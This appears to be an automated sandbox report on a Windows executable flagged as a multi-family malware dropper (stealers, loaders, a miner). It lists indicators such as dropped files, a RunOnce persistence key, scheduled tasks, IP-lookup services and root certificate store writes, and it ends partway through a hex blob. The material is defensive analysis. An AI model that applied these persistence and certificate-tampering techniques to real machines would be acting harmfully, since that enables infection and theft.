Malware Analysis Report

2024-10-19 02:13

Sample ID 240107-l26cksbgf3
Target 48ad5d8112df0d5b74f71fd25ccd4e18
SHA256 82e531dd4163ca5716a8b2f3feb188fc7fdbf8cac0270aa76664925fdd5124e2
Tags
nullmixer privateloader redline risepro sectoprat smokeloader vidar xmrig 706 build1 pub5 aspackv2 backdoor dropper infostealer loader miner persistence rat stealer trojan spyware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

82e531dd4163ca5716a8b2f3feb188fc7fdbf8cac0270aa76664925fdd5124e2

Threat Level: Known bad

The file 48ad5d8112df0d5b74f71fd25ccd4e18 was found to be: Known bad.

Malicious Activity Summary

nullmixer privateloader redline risepro sectoprat smokeloader vidar xmrig 706 build1 pub5 aspackv2 backdoor dropper infostealer loader miner persistence rat stealer trojan spyware

NullMixer

SectopRAT payload

RedLine

RisePro

Vidar

xmrig

SmokeLoader

RedLine payload

PrivateLoader

SectopRAT

Vidar Stealer

XMRig Miner payload

Executes dropped EXE

ASPack v2.12-2.42

Reads user/profile data of web browsers

Loads dropped DLL

Checks computer location settings

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Suspicious use of SetThreadContext

Drops file in Windows directory

Program crash

Enumerates physical storage devices

Unsigned PE

Checks SCSI registry key(s)

Uses Task Scheduler COM API

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Modifies Internet Explorer settings

Modifies system certificate store

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Modifies data under HKEY_USERS

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-01-07 10:02

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-01-07 10:02

Reported

2024-01-07 10:05

Platform

win7-20231215-en

Max time kernel

70s

Max time network

174s

Command Line

"C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe"

Signatures

NullMixer

dropper nullmixer

PrivateLoader

loader privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

RisePro

stealer risepro

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Vidar

stealer vidar

xmrig

miner xmrig

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\53d58f3832.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\53d58f3832.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\731da7284717.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\731da7284717.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\0b0f89497d35095.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\0b0f89497d35095.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\cb3f07883441a5d6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\cb3f07883441a5d6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\731da7284717.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\7da174d16d4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\7da174d16d4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\731da7284717.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\731da7284717.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\0b0f89497d35095.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\0b0f89497d35095.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\7zS08971586\0035b9e6fdaf9.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.db-ip.com N/A N/A
N/A api.db-ip.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3056 set thread context of 2012 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS08971586\53d58f3832.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS08971586\53d58f3832.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS08971586\53d58f3832.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{1853AB71-AD44-11EE-9F1C-6E556AB52A45} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\7zS08971586\7da174d16d4.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\7zS08971586\7da174d16d4.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\7zS08971586\27e380c23ad33.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\7zS08971586\81edfb0db828.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\7zS08971586\81edfb0db828.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\7zS08971586\27e380c23ad33.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\7zS08971586\27e380c23ad33.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c418